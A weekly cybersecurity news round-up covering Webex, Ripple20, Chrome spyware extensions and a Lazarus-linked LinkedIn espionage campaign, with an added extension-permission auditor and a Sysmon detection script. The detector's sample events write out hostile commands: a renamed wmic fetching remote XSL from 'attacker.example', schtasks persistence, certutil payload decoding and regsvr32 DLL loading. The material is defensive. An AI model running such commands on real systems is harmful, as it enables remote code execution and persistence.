Here is our cyber security round-up of the week:
Cisco WebEx vulnerability allows attackers to gain access to sensitive information
A flaw in the Cisco Webex Meetings desktop app for Windows, tracked as CVE-2020-3347 and affecting releases earlier than 40.6.0, could allow a local, authenticated attacker to gain access to sensitive information on an affected system, Cisco reported. An attacker with permission to view system memory could exploit the vulnerability by running an application on the local system that is designed to read shared memory, and so retrieve usernames, meeting information or authentication tokens that could aid further attacks.
The app uses shared memory in an unsafe way to exchange information with the underlying Windows OS and other apps on the system. “Once the application is installed, it adds a tray app that is started once a user logs on and has some dependent processes launched as well at that time. If a user has configured the client to log in automatically (default case), the following applies,” reads a post published by researchers who reported the issue.
An attacker could also use the stolen information to access the victim’s WebEx account. Cisco has already addressed the vulnerability with the release of Cisco Webex Meetings Desktop App for Windows releases 40.6.0 and later (versions 39.5.26 and later for lockdown versions). The company informed its users that there are no available workarounds at the moment. The good news is that Cisco is not aware of public reports or malicious use of this vulnerability.
Also read: 6 Cisco back-end servers hacked.
Ripple20 vulnerabilities in IoT supply chains
Researchers have discovered 19 vulnerabilities in a low-level TCP/IP software library used by "hundreds of millions" of IoT devices. The code was developed by the Ohio-based company Treck and has been integrated into the IoT supply chain since its release in the late 1990s. The set of flaws, dubbed "Ripple20", includes four remote code execution vulnerabilities, two of which received CVSS scores of 10. Treck has developed patches for the flaws and urges its customers to contact them for more information, noting that the level of exposure to the vulnerabilities varies greatly from product to product.
The real challenge, however, is that many IoT vendors likely don't know whether their products contain the vulnerable code. JSOF, the research firm behind the findings, collaborated with CERT/CC to track down "as many affected vendors as possible before the vulnerabilities became public," but there are many others whose status is still unknown. The researchers state, "Affected vendors range from one-person boutique shops to Fortune 500 multinational corporations, including HP, Schneider Electric, Intel, Rockwell Automation, Caterpillar, Baxter, as well as many other major international vendors suspected of being vulnerable in medical, transportation, industrial control, enterprise, energy (oil/gas), telecom, retail and commerce, and other industries."
CISA and CERT/CC lay out mitigations to minimise the risk of exploitation, and JSOF is offering a script that can help in some cases to determine whether a device is vulnerable. But despite these efforts, these vulnerabilities will haunt the IoT landscape for years to come.
Also read: IoT ‘dark_nexus’ botnet emerging
Australia warns of state-backed cyberattacks
Australia's Prime Minister Scott Morrison stated Friday that Australia is being targeted by a sophisticated, state-sponsored cyber actor "across a range of sectors, including all levels of government, industry, political organisations, education, health, essential service providers and operators of other critical infrastructure." Morrison noted that these attacks aren't new, but they're growing increasingly frequent. He declined to publicly attribute the activity to any specific nation-state, but noted that "there are not a large number of state-based actors that can engage in this type of activity and it is clear, based on the advice that we have received, that this has been done by a state-based actor with very, very significant capabilities."
The ASD's Australian Cyber Security Centre (ACSC) published an advisory on Thursday outlining the threat actor's tactics, techniques and procedures, and observers including the Guardian noted that, while the attacker may be sophisticated, the techniques themselves aren't particularly novel or advanced. The actor prefers to use open-source exploits against public-facing infrastructure. If that approach fails, the attackers turn to spear-phishing.
The ACSC's two key recommendations for organisations are obvious but important: patch internet-facing infrastructure promptly, and use multi-factor authentication for all remote access services.
Google removes 106 more extensions from its Chrome Web Store
Google recently removed 106 more extensions from its Chrome Web Store after they were found illegally collecting sensitive user data as part of a "massive global surveillance campaign" targeting oil and gas, finance, and healthcare sectors. Researchers disclosed the findings late last week, stating the malicious browser add-ons were tied back to a single internet domain registrar, GalComm. However, it's not immediately clear who is behind the spyware effort. This campaign and the Chrome extensions involved performed operations such as taking screenshots of the victim device, loading malware, reading the clipboard, and actively harvesting tokens and user input.
The extensions in question posed as utilities offering capabilities such as converting files from one format to another, alongside other tools for "secure browsing", while relying on thousands of fake reviews to trick unsuspecting users into installing them. In total, the extensions were downloaded nearly 33 million times over the course of three months before the researchers reached out to Google in May. The search giant, in response to the disclosures, has deactivated the problematic browser extensions. The full list of offending extension IDs can be accessed here.
Deceptive extensions on the Chrome Web Store have been a persistent problem, with bad actors exploiting the store for malvertising and other data-stealing campaigns. Google had previously removed 500 malware-ridden extensions after they were caught serving adware and sending users' browsing activity to attacker-controlled servers. Then in April, the company yanked another 49 extensions that masqueraded as cryptocurrency wallets to steal Keystore information.
It's recommended that users review extension permissions by visiting "chrome://extensions" on the Chrome browser, consider uninstalling those that are rarely used, or switch to other software alternatives that don't require invasive access to browser activity.
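Reviewing permissions by hand in chrome://extensions works for one machine; the script below is an added example (not code from Google, the researchers or QA) that does the same review over every manifest.json in a Chrome profile and flags the capabilities the campaign above relied on: clipboard reads, request and cookie access, and all-site host access that enables screenshots via tabs.captureVisibleTab. The risk labels, the default profile paths and the two sample manifests are this example's own assumptions, not an official Chrome rating.

```python
"""Audit Chrome extension manifests for spyware-grade permissions.

Added example for this round-up; not code from Google, Awake Security or QA.
Risk labels, default paths and the sample manifests are assumptions."""
import json
import os
import sys
from pathlib import Path

# API permissions that let an extension observe or alter most browser activity.
# Labels are this example's own judgement, not an official Chrome rating.
HIGH_RISK_APIS = {
    "webRequest": "observe every request (cookies, tokens, form posts)",
    "webRequestBlocking": "rewrite or redirect every request",
    "cookies": "read session cookies on permitted sites",
    "clipboardRead": "read the clipboard",
    "desktopCapture": "capture the screen",
    "debugger": "drive any tab over the DevTools protocol",
    "nativeMessaging": "talk to a native binary outside the sandbox",
    "proxy": "route all traffic through a chosen host",
    "history": "read browsing history",
    "management": "enumerate or disable other extensions",
}

def is_broad_host(pattern: str) -> bool:
    """True for match patterns covering every site: <all_urls>, *://*/*, https://*/*.
    A wildcard subdomain such as https://*.example.com/* is not broad."""
    if pattern == "<all_urls>":
        return True
    _scheme, sep, rest = pattern.partition("://")
    if not sep:
        return False
    host = rest.split("/", 1)[0]
    return host == "*"

def host_patterns(manifest: dict) -> list:
    """Every host pattern the manifest grants. MV2 mixes them into 'permissions',
    MV3 uses 'host_permissions', and content_scripts 'matches' grant page access too."""
    pats = []
    for key in ("permissions", "optional_permissions", "host_permissions", "optional_host_permissions"):
        pats += [p for p in manifest.get(key, []) if p == "<all_urls>" or "://" in p]
    for script in manifest.get("content_scripts", []):
        pats += script.get("matches", [])
    return pats

def api_permissions(manifest: dict) -> list:
    return [p for key in ("permissions", "optional_permissions")
            for p in manifest.get(key, []) if p != "<all_urls>" and "://" not in p]

def audit_manifest(manifest: dict) -> list:
    """Return human-readable findings; an empty list means nothing was flagged."""
    apis = api_permissions(manifest)
    findings = [f"{p}: {HIGH_RISK_APIS[p]}" for p in apis if p in HIGH_RISK_APIS]
    broad = sorted({p for p in host_patterns(manifest) if is_broad_host(p)})
    if broad:
        findings.append("runs on every site via " + ", ".join(broad))
        if "tabs" in apis:
            findings.append("tabs + all-site access: can read every tab URL and "
                            "screenshot any page (tabs.captureVisibleTab)")
    return findings

def scan_profile(extensions_dir: Path) -> dict:
    """Walk <profile>/Extensions/<id>/<version>/manifest.json and audit each one."""
    results = {}
    for manifest_path in extensions_dir.glob("*/*/manifest.json"):
        ext_id = manifest_path.parent.parent.name
        try:
            manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        except (OSError, ValueError) as exc:
            results[ext_id] = [f"unreadable manifest: {exc}"]
            continue
        results[ext_id] = audit_manifest(manifest)
    return results

def default_extensions_dir() -> Path:
    """Default Chrome profile location on Windows and Linux (assumed standard install)."""
    if sys.platform == "win32":
        return Path(os.environ["LOCALAPPDATA"]) / "Google/Chrome/User Data/Default/Extensions"
    return Path.home() / ".config/google-chrome/Default/Extensions"

# Constructed manifests for a stand-alone run; these are not real Web Store extensions.
SAMPLE_MANIFESTS = {
    "benign_converter": {"manifest_version": 3, "name": "PDF to DOCX (sample)",
                         "permissions": ["storage", "activeTab"]},
    "spyware_like": {"manifest_version": 2, "name": "Secure Browsing Helper (sample)",
                     "permissions": ["tabs", "clipboardRead", "webRequest", "cookies", "<all_urls>"],
                     "content_scripts": [{"matches": ["*://*/*"], "js": ["inject.js"]}]},
}

if __name__ == "__main__":
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else default_extensions_dir()
    results = (scan_profile(target) if target.is_dir()
               else {k: audit_manifest(v) for k, v in SAMPLE_MANIFESTS.items()})
    for ext_id, findings in results.items():
        print(ext_id, "->", "; ".join(findings) or "nothing flagged")
```

Run it with no arguments against the default profile, or pass the path to another profile's Extensions folder; with no profile present it audits the two constructed manifests instead. A file converter that asks for nothing beyond storage and activeTab is what the legitimate utility these extensions imitated would look like; an extension that wants all-site access plus clipboardRead, webRequest and cookies has exactly the capability set the campaign used.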
Android spyware targets Uyghur Muslims
Researchers have discovered a previously undocumented Android spyware strain that's targeting Tibet, Turkey, and Taiwan, with a particular focus on Uyghur Muslims. The researchers have dubbed the malware "ActionSpy" and they've tied it to the China-associated Earth Empusa APT (also known as POISON CARP or Evil Eye).
The group uses watering-hole and phishing attacks to lure victims to spoofed websites that install the malware. The researchers note that these tactics resemble those used in Operation Poisoned News, another recent campaign that targeted iOS users in Hong Kong. The same group has also been linked to the series of watering-hole attacks Google disclosed last year, which used five iOS exploit chains to compromise visitors' phones.
Sophisticated cyber-espionage campaign directed against aerospace and military
Cybersecurity researchers at ESET this week took the wraps off a new, sophisticated cyber-espionage campaign directed against aerospace and military organisations in Europe and the Middle East, aimed at spying on key employees of the targeted firms and, in some cases, siphoning money. The campaign, dubbed "Operation In(ter)ception" after a reference to "Inception" in a malware sample, took place between September and December 2019.
The primary goal of the operation was espionage. However, in one of the cases ESET investigated, the attackers tried to monetise access to a victim's email account through a business email compromise (BEC) attack as the final stage of the operation. The financial motivation, together with similarities in targeting and development environment, led ESET to suspect the Lazarus Group, a notorious hacking group believed to work on behalf of the North Korean government to fund the country's weapons and missile programmes.
Also read: How hackers can hack a plane
Researchers said the campaign was highly targeted and relied on social engineering: the attackers lured employees of the chosen companies with fake job offers sent through LinkedIn's messaging feature, posing as HR managers of well-known aerospace and defence companies, including Collins Aerospace and General Dynamics. At two of the affected European companies, once contact was established the attackers slipped malicious files into the conversation, disguised as documents relating to the advertised job.
The decoy RAR archives, sent directly in the chats or via emails from the fake LinkedIn personas pointing to a OneDrive link, purported to contain a PDF detailing salary information for the advertised position. Opening them instead ran the Windows Command Prompt to perform a series of actions:
- copy Windows Management Instrumentation command-line tool (wmic.exe) to a specific folder,
- rename it to something innocuous to evade detection (e.g., Intel, NVidia, Skype, OneDrive and Mozilla), and
- create scheduled tasks that execute a remote XSL script via WMIC.
Having gained an initial foothold inside the target company, the threat actors deployed a custom malware downloader, which in turn fetched a previously undocumented second-stage payload: a C++ backdoor that periodically sends requests to an attacker-controlled server, carries out pre-defined actions based on the commands it receives, and exfiltrates the collected information as a RAR file via a modified version of dbxcli, an open-source command-line client for Dropbox.
In addition to using WMIC to interpret remote XSL scripts, the adversaries also abused native Windows utilities such as "certutil" to decode base64-encoded downloaded payloads, and "rundll32" and "regsvr32" to run their custom malware.
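Every step in the chain above (the three actions the decoy performs, plus the certutil, rundll32 and regsvr32 abuse) leaves a trace in process-creation telemetry, and the binaries themselves are signed Microsoft tools, so detection has to key on how they are invoked rather than what they are. The script below is an added example written for this round-up (not ESET's code or tooling) that runs those checks over constructed events shaped like Sysmon Event ID 1 records: a copy of wmic.exe whose PE version resource still says wmic.exe but which runs under another name, a /format: argument that fetches a remote XSL, a schtasks /create that persists it, certutil -decode, and rundll32/regsvr32 loading DLLs from user-writable paths. The field names, the sample events and the attacker.example host are assumptions of the example; the user-writable-path heuristic is this example's own and is not something the page states.

```python
"""Flag the living-off-the-land tradecraft described above in process-creation
telemetry. Added example for this round-up, not ESET's code or tooling.

Assumptions: field names follow Sysmon Event ID 1 (Image, OriginalFileName,
CommandLine); the events below are constructed; attacker.example is a placeholder."""
import re
from pathlib import PureWindowsPath

LOLBINS = {"wmic.exe", "certutil.exe", "rundll32.exe", "regsvr32.exe", "schtasks.exe"}
# Directories an unprivileged user can write to; heuristic chosen for this example.
USER_WRITABLE = re.compile(r"(?i)\\(Users\\[^\\]+\\AppData|Users\\Public|ProgramData|Windows\\Temp)\\")
FORMAT_ARG = re.compile(r'(?i)/format\s*:\s*"?\s*([^"\s]+)')   # wmic ... /format:<target>
CERTUTIL_ABUSE = re.compile(r"(?i)\s-(decode|decodehex|urlcache)\b")

def image_name(path: str) -> str:
    return PureWindowsPath(path).name.lower()

def detect(event: dict) -> list:
    """Return the suspicious traits of one process-creation event (empty if none)."""
    image = image_name(event.get("Image", ""))
    original = event.get("OriginalFileName", "").lower()
    cmd = event.get("CommandLine", "")
    hits = []
    # Copying wmic.exe to Intel.exe changes the on-disk name, not the PE version resource.
    if original in LOLBINS and original != image:
        hits.append(f"renamed {original} running as {image}")
    # Built-in formats (list, csv, ...) are normal; a URL or .xsl path means script execution.
    m = FORMAT_ARG.search(cmd)
    if m:
        target = m.group(1)
        if re.match(r"(?i)https?://", target):
            hits.append(f"WMIC /format: fetching remote XSL from {target}")
        elif target.lower().endswith(".xsl"):
            hits.append(f"WMIC /format: executing local XSL {target}")
    # Persistence: a scheduled task whose action is an XSL fetch or lives in a user-writable path.
    if image == "schtasks.exe" and "/create" in cmd.lower() and (m or USER_WRITABLE.search(cmd)):
        hits.append("schtasks /create persisting a LOLBin command")
    if "certutil.exe" in (image, original) and CERTUTIL_ABUSE.search(cmd):
        hits.append("certutil used to decode or download a payload")
    if image in ("rundll32.exe", "regsvr32.exe") and USER_WRITABLE.search(cmd):
        hits.append(f"{image} loading a DLL from a user-writable path")
    return hits

def triage(events: list) -> list:
    """(index, hits) for every event with at least one finding."""
    return [(i, detect(e)) for i, e in enumerate(events) if detect(e)]

# Constructed sample events mirroring the chain described above; not real telemetry.
BASE = r"C:\Users\jsmith\AppData\Roaming\Intel"
XSL = "https://attacker.example/update.xsl"
SAMPLE_EVENTS = [
    {"Image": BASE + r"\Intel.exe", "OriginalFileName": "wmic.exe",
     "CommandLine": BASE + r"\Intel.exe os get /format:" + XSL},
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": 'schtasks.exe /create /sc minute /mo 30 /tn IntelUpdate /tr "'
                    + BASE + r"\Intel.exe os get /format:" + XSL + '"'},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil.exe -decode C:\Users\jsmith\AppData\Local\Temp\p.b64 "
                    r"C:\Users\jsmith\AppData\Local\Temp\p.dll"},
    {"Image": r"C:\Windows\System32\regsvr32.exe", "OriginalFileName": "REGSVR32.EXE",
     "CommandLine": r"regsvr32.exe /s C:\Users\jsmith\AppData\Local\Temp\p.dll"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"rundll32.exe C:\ProgramData\OneDrive\od.dll,Start"},
    # Benign: stock WMIC with a built-in output format, and a control-panel applet via rundll32.
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe", "OriginalFileName": "wmic.exe",
     "CommandLine": "wmic os get caption /format:list"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL timedate.cpl"},
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(hits))
```

The OriginalFileName check is the one that survives the renaming step: however innocuous the copy is called, the version resource Sysmon reads still identifies it as wmic.exe. The /format: check deliberately ignores wmic's built-in output formats so that ordinary inventory scripts do not fire, and the two benign sample events exercise exactly that.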
"We actively seek out signs of state-sponsored activity on the platform and quickly take action against bad actors in order to protect our members. We don't wait on requests, our threat intelligence team removes fake accounts using information we uncover and intelligence from a variety of sources, including government agencies," said Paul Rockwell, Head of Trust and Safety at LinkedIn, in response.
Edited and compiled by QA's Director of Cyber, Richard Beck.